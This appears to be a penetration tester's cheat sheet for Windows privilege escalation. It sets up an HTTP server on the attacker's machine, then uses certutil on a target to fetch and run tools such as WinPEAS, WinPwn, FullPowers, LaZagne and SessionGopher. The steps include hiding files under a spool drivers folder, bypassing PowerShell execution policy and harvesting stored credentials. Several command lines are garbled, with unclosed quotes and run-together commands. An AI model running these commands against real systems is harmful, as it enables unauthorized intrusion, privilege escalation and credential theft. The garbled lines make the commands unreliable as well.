Prepare the own system:
cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80
Prepare the target:
set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc
Download most scripts at once (>30 MB!):
certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip
WinPeas
winPEAS.bat
winPEASx86.exe
winPEASx64.exe
Powerless
certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat
Windows Exploit Suggester NG
Github (Old version for old systems)
On the victim, execute systeminfo and save its output on the local system. Then:
python3 wes.py --updatepython3 wes.py /tmp/systeminfo
WinPWN
- Update the repo first
cd /opt/WinPwn && git pull && python -m SimpleHTTPServer 80 - On the target:
certutil.exe -urlcache -split -f "http://$NTPSRV/Offline_WinPwn.ps1" Offline_WinPwn.ps1 - Execute:
powershell -exec bypass
Import-Module .\Offline_Winpwn.ps1
WinPwn
orpowershell.exe -ExecutionPolicy ByPass -command "& { . Import-Module .\Offline_Winpwn.ps1; WinPwn }"
Sherlock
JAWS
certutil.exe -urlcache -split -f "http://$NTPSRV/jaws-enum.ps1" jaws-enum.ps1 powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
PowerSploit / PowerUp
If Powershell is not available. use SharpUp.
BeRoot
certutil.exe -urlcache -split -f "http://$NTPSRV/beRoot.exe" beRoot.exe beRoot.exe
Seatbelt
certutil.exe -urlcache -split -f "http://$NTPSRV/seatbelt.exe" seatbelt.exe
See the Seatbelt post for more details.
FullPowers
Works only for users with */local service or */network service (check whoami output) Opens a new shell with all service privileges set.
certutil.exe -urlcache -split -f "http://$NTPSRV/FullPowers.exe" FullPowers.exe FullPowers.exe
Retrieving credentials
LaZagne
Retrieves many credentials from various software.
certutil.exe -urlcache -split -f "http://$NTPSRV/laZagne.exe" laZagne.exe laZagne.exe all
SessionGopher
certutil.exe -urlcache -split -f "http://$NTPSRV/SessionGopher.ps1" SessionGopher.ps1
powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "& { . .\SessionGopher.ps1; Invoke-SessionGopher -Thorough}"
Leave a Reply
You must be logged in to post a comment.